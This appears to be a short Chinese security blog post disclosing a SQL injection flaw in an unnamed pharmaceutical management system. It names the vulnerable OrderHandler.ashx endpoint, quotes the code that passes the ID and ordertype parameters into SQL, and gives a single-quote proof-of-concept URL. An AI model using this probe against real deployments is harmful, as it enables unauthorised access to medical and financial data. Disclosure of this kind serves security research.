【1day】某医药系统存在前台SQL注入漏洞

发布于 作者:

【1day】某医药系统存在前台SQL注入漏洞

原创 XingYue404 星悦安全 2025-06-03 11:29

【1day】某医药系统存在前台SQL注入漏洞 -1

点击上方
蓝字
关注我们 并设为
星标

0x01 漏洞分析

XX医药管理系统

【1day】某医药系统存在前台SQL注入漏洞 -2

工具一把梭哈找前台接口,分析代码

/admin/caiwuchongxiao/OrderHandler.ashx

【1day】某医药系统存在前台SQL注入漏洞 -3 

context.Response.Write(GetData("list", context.Request["ID"].ToString(),
context.Request["ordertype"].ToString()));

接收 get 传参的 ID 和 ordertype 拼接到 sql 语句去执行

POC 

/admin/caiwuchongxiao/OrderHandler.ashx?ID=1&ordertype=1

【1day】某医药系统存在前台SQL注入漏洞 -4

单引号报错语法错误 

/admin/caiwuchongxiao/OrderHandler.ashx?ID=1%27&ordertype=1

【1day】某医药系统存在前台SQL注入漏洞 -5

0x02 关注公众号

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

关注公众号,持续更新安全文章!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!